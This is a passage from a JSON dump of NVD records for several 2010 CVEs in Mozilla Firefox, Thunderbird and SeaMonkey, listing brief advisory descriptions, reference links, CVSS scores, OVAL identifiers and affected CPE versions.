"cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3176", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3176", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=590291", "http://www.securityfocus.com/bid/44245", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=590116", "https://bugzilla.mozilla.org/show_bug.cgi?id=554670", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.6.x before 3.6.11 and Thunderbird 3.1.x before 3.1.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:02", "title": "CVE-2010-3175", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11943", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11943"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3175"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11943", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11943"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:firefox:3.6.6"], "id": "CVE-2010-3175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3175", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.securityfocus.com/bid/44251", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://support.avaya.com/css/P8/documents/100114250", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=590753", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.redhat.com/support/errata/RHSA-2010-0780.html", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"], "description": "A certain application-launch script in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 on Linux places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3182", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13844", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13844"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3182"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13844", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:13844"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3182", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:07", "references": ["http://www.ubuntu.com/usn/usn-1011-1", "http://isc.sans.edu/diary.html?storyid=9817", "http://www.exploit-db.com/exploits/15342", "http://www.exploit-db.com/exploits/15341", "https://bugzilla.mozilla.org/show_bug.cgi?id=607222#c53", "http://support.avaya.com/css/P8/documents/100114335", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:213", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "https://rhn.redhat.com/errata/RHSA-2010-0812.html", "http://www.ubuntu.com/usn/USN-1011-3", "http://www.securitytracker.com/id?1024650", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:219", "http://www.vupen.com/english/advisories/2010/2857", "http://www.redhat.com/support/errata/RHSA-2010-0810.html", "http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.securityfocus.com/bid/44425", "http://www.norman.com/about_norman/press_center/news_archive/2010/129223/", "http://www.vupen.com/english/advisories/2010/2871", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.vupen.com/english/advisories/2010/2837", "http://norman.com/about_norman/press_center/news_archive/2010/129223/en?utm_source=twitterfeed&utm_medium=twitter", "http://www.redhat.com/support/errata/RHSA-2010-0808.html", "http://www.redhat.com/support/errata/RHSA-2010-0809.html", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.exploit-db.com/exploits/15352", "http://www.securitytracker.com/id?1024645", "http://www.debian.org/security/2010/dsa-2124", "https://bugzilla.redhat.com/show_bug.cgi?id=646997", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.556706", "https://bugzilla.mozilla.org/show_bug.cgi?id=607222", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050061.html", "http://www.vupen.com/english/advisories/2010/2864", "http://www.ubuntu.com/usn/USN-1011-2", "http://www.norman.com/security_center/virus_description_archive/129146/", "http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050233.html", "http://support.avaya.com/css/P8/documents/100114329", "http://www.vupen.com/english/advisories/2011/0061", "http://www.securitytracker.com/id?1024651"], "description": "Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.", "edition": 2, "reporter": "NVD", "published": "2010-10-27T20:00:05", "title": "CVE-2010-3765", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:07", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12108", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12108"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3765"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12108", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12108"}], "modified": "2017-09-18T21:31:32", "cpe": ["cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:3.5.14", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:seamonkey:2.0.9", "cpe:/a:mozilla:thunderbird:3.1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:firefox:3.6.11", "cpe:/a:mozilla:thunderbird:3.0.9", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:2.0.1"], "id": "CVE-2010-3765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3765", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:03", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00001.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://support.avaya.com/css/P8/documents/100114250", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2123", "http://www.ubuntu.com/usn/USN-1007-1", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=578697"], "description": "Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 recognize a wildcard IP address in the subject's Common Name field of an X.509 certificate, which might allow man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:02", "title": "CVE-2010-3170", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:03", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12254", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12254"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3170"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12254", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12254"}], "modified": "2017-09-18T21:31:15", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", 